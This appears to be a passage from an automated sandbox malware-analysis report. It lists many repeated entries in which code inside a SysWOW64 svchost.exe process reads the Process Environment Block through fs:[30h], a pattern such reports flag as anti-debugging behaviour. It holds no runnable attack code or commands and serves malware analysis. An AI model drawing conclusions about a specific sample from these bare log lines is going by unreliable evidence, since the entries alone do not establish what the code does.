                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]2_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]2_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]2_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]2_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]2_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]2_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]2_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]2_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]2_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]2_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]2_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]2_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]2_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]2_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]2_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]2_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]2_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]2_2_0376E443
